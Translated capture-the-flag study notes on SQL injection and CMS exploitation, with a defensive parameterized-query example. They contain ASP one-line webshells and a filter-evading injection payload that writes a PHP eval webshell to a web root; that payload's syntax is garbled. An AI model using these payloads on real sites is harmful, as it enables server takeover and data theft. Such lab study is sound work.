CTF study notes 5

SQL injection:

* SQL injection is an attack in which SQL code is added to input parameters, which are then sent to the server to be parsed and executed.

* When input parameters are not filtered and are spliced directly into an SQL statement before it is parsed, the statement can execute behaviour that was never anticipated. This is called an SQL injection attack.

Types of SQL injection attack:

(1) Numeric injection:

Requesting learn.me/sql/article.php?id=1 in the browser address bar is equivalent to running a query like:

$sql = "SELECT * FROM article WHERE id = " . $id;

Normally this returns the article with id = 1. If the browser instead requests learn.me/sql/article.php?id=-1 OR 1=1, the WHERE clause becomes always true.

This is an SQL injection attack; it may return the information of every article.

(2) String injection:

Platforms usually have a user login where you must enter the correct account and password to log in.

Because the username and password are strings, the SQL injection method here is to make the data carried in the parameter turn the rest of the statement into a comment in MySQL.

'#' and '--': if you enter user'# as the username and any password such as 111, the statement is equivalent to username = 'user'#' and password = '111', but everything after # is treated as a comment and ignored.

'--' likewise comments out everything that follows, so a wrong password, or no password at all, still lets you log in.

' or 1=1 # is the commonly used form: it is equivalent to a WHERE condition, and because 1=1 always holds, the WHERE clause is true.
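The two injection cases above, shown side by side with the parameterized form that stops them. This is an added example, not code from the original notes; the tables are constructed and SQLite stands in for MySQL (SQLite does not treat # as a comment, so the comment payloads use '-- ', which both engines accept).

```python
import sqlite3

# Constructed in-memory database standing in for the MySQL backend in the notes.
# Passwords are stored in clear here only to keep the example short.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT);
INSERT INTO article VALUES (1, 'first'), (2, 'second'), (3, 'third');
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO users VALUES ('admin', 's3cret-not-123');
""")


def vulnerable_lookup(id_param: str):
    # Numeric injection: the unfiltered parameter is spliced into the statement,
    # so "-1 OR 1=1" turns the WHERE clause into one that matches every row.
    sql = "SELECT id FROM article WHERE id = " + id_param
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(id_param: str):
    # Validate the type first, then let the driver bind the value as data;
    # whatever the client sent can never be parsed as SQL.
    article_id = int(id_param)  # raises ValueError for "-1 OR 1=1"
    sql = "SELECT id FROM article WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (article_id,))]


def vulnerable_login(user: str, password: str) -> bool:
    # String injection: a closing quote plus a comment marker in the username
    # comments out the "AND password = ..." part of the statement.
    sql = ("SELECT 1 FROM users WHERE username = '" + user
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def safe_login(user: str, password: str) -> bool:
    # Same query with placeholders: the quote and comment marker are just
    # characters inside the bound username and match nothing.
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (user, password)).fetchone() is not None


if __name__ == "__main__":
    print(sorted(vulnerable_lookup("-1 OR 1=1")))  # [1, 2, 3]: every article leaks
    print(vulnerable_login("admin'-- ", "111"))    # True: password check commented out
    print(safe_login("admin'-- ", "111"))          # False: the quote is only data
```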

Weak password: a simple password such as 123 that is easy to crack.

One-line trojan (webshell):

<% execute request("value") %>
where value is the parameter name, so you can change it to your own value; the request in front of it fetches that value.
<% eval request("value") %> (now more common; because it uses fewer characters it is more practical where there are restrictions on the words that can be written)
Once you know the URL of the database, you can connect to it from a local client to get a webshell. (You do not need to know the database; it is enough to know the ASP file into which <% eval request("value") %> was inserted.)
Environment requirements:

1. The guest account has write access on the server
2. The database address is known and the database format is asp or asa
3. If the database format is not asp or asa, the one-liner can be inserted into an asp file instead

Original link: https://blog.csdn.net/gl620321/article/details/89406176

CMS vulnerabilities:

The general steps for solving this kind of exercise environment:

1. Scan for the admin backend with a tool (Yujian (御剑), D Shield (D盾))

Usually /admin or something like /wp-login.php

2. After locating the backend login, obtain the administrator account and password

Try SQL injection and weak-password brute forcing

3. After logging in, upload a one-line trojan, then connect to it with China Chopper and look for the flag in the root directory

Example: given the URL http://219.153.49.228:44930

Use Yujian to scan for the backend

The site's admin backend was found

Then we test for SQL injection

Entering 1' as the account makes the database operation fail and the error is displayed, so the site has an injection point.

Entering 1'and'1'='1 as the account returns the normal login screen, so this is a string injection; next, guess the number of fields.

Entering 1'order by 5# as the account shows that # works as the comment (the ORDER BY clause sorts the result set; each expression in ORDER BY is a column name or a column ordinal starting from 1).

Then use Burp Suite (bp) to construct a one-line webshell statement; the doubled keyword fragments are there to survive a filter that strips union, select and into outfile once:

1' uni union on selselectect '<%php @eval($_POST['cmd'])?>',2,3,4,5 in into outoutfilefile '/var/www/html/shell.php'#

Convert it to hexadecimal and write it in, then connect with China Chopper and find the shell in the root directory.


Origin: www.cnblogs.com/wcwxb555/p/11968548.html